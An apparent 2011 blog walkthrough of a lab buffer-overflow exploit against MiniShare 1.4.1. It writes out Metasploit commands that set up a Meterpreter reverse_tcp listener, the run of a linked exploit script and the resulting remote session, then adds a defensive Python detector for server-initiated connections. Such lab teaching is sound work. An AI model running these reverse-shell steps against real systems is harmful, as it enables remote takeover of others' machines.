Archive for June, 2011

Lesson 0ne: Stack Based Buffer Overflow [minisploit.py]

#=========================================================#
I thought it was a good idea to start learning about exploit development, and my first stop was on this wonderful blog by lupin (Thanks a LOT lupin).
To all the beginners like myself, I would advise you to look at the tutorials; they are excellent.
So after going through the basics tutorial, I thought: why not write the exploit from scratch again, make it take options from the command line, use meterpreter as the payload, and host it somewhere for future REFERENCE?
what is it:
++++++++
This is a simple stack-based buffer overflow exploit. I wrote this one using the guides from lupin's blog, as said earlier.
It exploits a vulnerability in the Windows application MiniShare 1.4.1, which is an older version of the MiniShare application.
Requirements:
+++++++++++++
1. To test this script you will need a Windows XP SP2 machine (can be a virtual machine).
2. The XP machine should be running MiniShare 1.4.1, available here.
3. An attack machine (should have Python and Metasploit installed); BackTrack (bt) should do.
how to:
++++++
[1] First get the script from here.
[2] The payload I used here is meterpreter/reverse_tcp, so we need to start a listener on our attacking machine to take care of this.
how:
+++++
[a] Run msfconsole from your terminal or from the msf installation directory.

root@chim3ra:~# cd /pentest/exploits/framework3
root@chim3ra:/pentest/exploits/framework3# ./msfconsole

o                       8         o   o
8                       8             8
ooYoYo. .oPYo.  o8P .oPYo. .oPYo. .oPYo. 8 .oPYo. o8  o8P
8' 8  8 8oooo8   8  .oooo8 Yb..   8    8 8 8    8  8   8
8  8  8 8.       8  8    8   'Yb. 8    8 8 8    8  8   8
8  8  8 `Yooo'   8  `YooP8 `YooP' 8YooP' 8 `YooP'  8   8
..:..:..:.....:::..::.....::.....:8.....:..:.....::..::..:
::::::::::::::::::::::::::::::::::8:::::::::::::::::::::::
::::::::::::::::::::::::::::::::::::::::::::::::::::::::::

=[ metasploit v3.8.0-dev [core:3.8 api:1.0]
+ -- --=[ 696 exploits - 358 auxiliary - 52 post
+ -- --=[ 224 payloads - 27 encoders - 8 nops
=[ svn r12936 updated 11 days ago (2011.06.13)


Warning: This copy of the Metasploit Framework was last updated 11 days ago.
We recommend that you update the framework at least every other day.
For information on updating your copy of Metasploit, please see:
http://www.metasploit.com/redmine/projects/framework/wiki/Updating
msf >

[b] Then we use multi/handler to listen on our attacking machine, set the payload to meterpreter and lhost to our attacking IP.


msf > use exploit/multi/handler
msf exploit(handler) > set payload windows/meterpreter/reverse_tcp
payload => windows/meterpreter/reverse_tcp
msf exploit(handler) > set lhost 192.168.56.1
lhost => 192.168.56.1
msf exploit(handler) >

[c] And finally we exploit:


msf exploit(handler) > exploit

[*] Started reverse handler on 192.168.56.1:4444
[*] Starting the payload handler...

[3] Now make sure that MiniShare is running on your XP box; if not, just double-click the shortcut on your desktop and drag a folder or file inside.
Running the script:
++++++++++++++
[4] You may run the script with no options or with the -h (help) option to get the usage:


root@chim3ra:~/exploit_home# ./minisploit.py
you need at least one arguments

###################################################################
#============+++++++++ minisploit.py ver0.1++++++++==============#
#----------------by ch!m3ra: http://www.chimera40.wordpress.com------------------#
#=============++++++++++++++++++++++++++++++++++++++==============#
###################################################################

Usage:./minisploit.py <options>
./minisploit.py -t <host> -p <port>
-t          The remote host to exploit
-p          The remote port (Default is 80)
-h          Simply print this help menu and exit for
Example:./minisploit.py -h 192.168.56.101 -p 80
(this will exploit minishare server at 192.168.56.101 )
or ./minisploit.py -h for help
please make sure you start multi handler(meterpreter)

[5] Then run it giving -t <host> (the target option), where <host> is your XP machine's IP.
[6] NB: You may give -p <port> (the port option) or leave it at the default, 80, which is where MiniShare runs by default.
[d] Everything set, let's launch our exploit:

root@chim3ra:~/exploit_home# ./minisploit.py -t 192.168.56.101 -p 80

###################################################################
#============++++++ minisploit.py ver 0.1 ++++++++++==============#
#--------by ch!m3ra: http://www.chimera40.wordpress.com-----------#
#=============++++++++++++++++++++++++++++++++++++++==============#
###################################################################

[+]Trying your payload on 192.168.56.101  Port 80 Please Wait......
[+]Connecting to  192.168.56.101 ........
[+]Connection successful!
[+]Delivering your payload be patient......
[+]Done!
[+]Your exploit data has been send to 192.168.56.101 Check you handler happy? :)
root@chim3ra:~/exploit_home#

[e] Done, and when we check our handler:
boooom!

msf exploit(handler) > exploit

[*] Started reverse handler on 192.168.56.1:4444
[*] Starting the payload handler...
[*] Sending stage (749056 bytes) to 192.168.56.101
[*] Meterpreter session 1 opened (192.168.56.1:4444 -> 192.168.56.101:1035) at Fri Jun 24 11:57:11 +0300 2011

meterpreter >
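
Look closely at that session line: the handler prints listener-first (192.168.56.1:4444 -> 192.168.56.101:1035), but the ephemeral port 1035 on the XP box tells you it is the MiniShare host that opened the connection. A file-sharing server has no reason to initiate outbound TCP sessions at all, and that is the cheapest thing a defender can watch for. The script below is an added example, not part of this post or of minisploit.py: it runs simple detection logic over a few constructed connection-log lines (one record per TCP session, initiator first, in a made-up format) and flags any session where the server is the initiator, with the multi/handler default port 4444 as a second, weaker hint.

```python
import re

# Constructed sample records (not a capture from the post): one line per TCP
# session, written as "timestamp TCP initiator:port -> responder:port".
# 192.168.56.101 plays the MiniShare box: it should only ever be the responder,
# and only on port 80. The third line mirrors the reverse_tcp session above.
SAMPLE_LOG = """\
2011-06-24T11:57:01 TCP 192.168.56.1:51022 -> 192.168.56.101:80
2011-06-24T11:57:02 TCP 192.168.56.1:51023 -> 192.168.56.101:80
2011-06-24T11:57:11 TCP 192.168.56.101:1035 -> 192.168.56.1:4444
2011-06-24T11:58:40 TCP 192.168.56.20:40001 -> 192.168.56.101:80
garbage line that should be skipped
"""

LINE_RE = re.compile(
    r"^(?P<ts>\S+)\s+TCP\s+(?P<src>[\d.]+):(?P<sport>\d+)"
    r"\s+->\s+(?P<dst>[\d.]+):(?P<dport>\d+)$"
)

# Default listener port of the multi/handler shown above. Only a weak hint:
# a listener can sit on any port, so the initiator check is the one that counts.
DEFAULT_HANDLER_PORTS = {4444}


def parse_connections(text):
    """Turn the log text into a list of dicts, skipping lines that don't match."""
    conns = []
    for line in text.splitlines():
        m = LINE_RE.match(line.strip())
        if m is None:
            continue
        conns.append({
            "ts": m["ts"],
            "src": m["src"], "sport": int(m["sport"]),
            "dst": m["dst"], "dport": int(m["dport"]),
        })
    return conns


def find_reverse_connections(conns, server_ip, hint_ports=DEFAULT_HANDLER_PORTS):
    """Return (record, reasons) pairs for sessions that look like a reverse shell.

    Any session the server host itself initiates is reported, because a
    host that only serves HTTP should never be the initiator. A destination
    port matching a well-known handler default is recorded as a second reason.
    """
    alerts = []
    for c in conns:
        reasons = []
        if c["src"] == server_ip:
            reasons.append("server_initiated")
        if c["dport"] in hint_ports:
            reasons.append("default_handler_port")
        if reasons:
            alerts.append((c, reasons))
    return alerts


def format_alert(record, reasons):
    """One human-readable alert line per flagged session."""
    return "{ts} {src}:{sport} -> {dst}:{dport} [{why}]".format(
        why=",".join(reasons), **record)


if __name__ == "__main__":
    records = parse_connections(SAMPLE_LOG)
    for rec, why in find_reverse_connections(records, "192.168.56.101"):
        print(format_alert(rec, why))
```

Run against the sample, only the 11:57:11 session is reported, and it carries both reasons. The same check works on any log that records the session initiator (a firewall or flow log on the XP box's segment); in practice you would also want a rule on the host itself that blocks the server process from opening outbound sockets, since that removes the reverse_tcp stage entirely rather than just noticing it.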

That's all there is to the post. I know it's a long post for no good reason, but it's a post anyway 😉
If you have read all the way through, then here are some goodies and some fun here.

This links collection I stumbled over on the net; you must like it.
Thanks to Myne-us for the links and to lupin for teaching me; you guys rock 🙂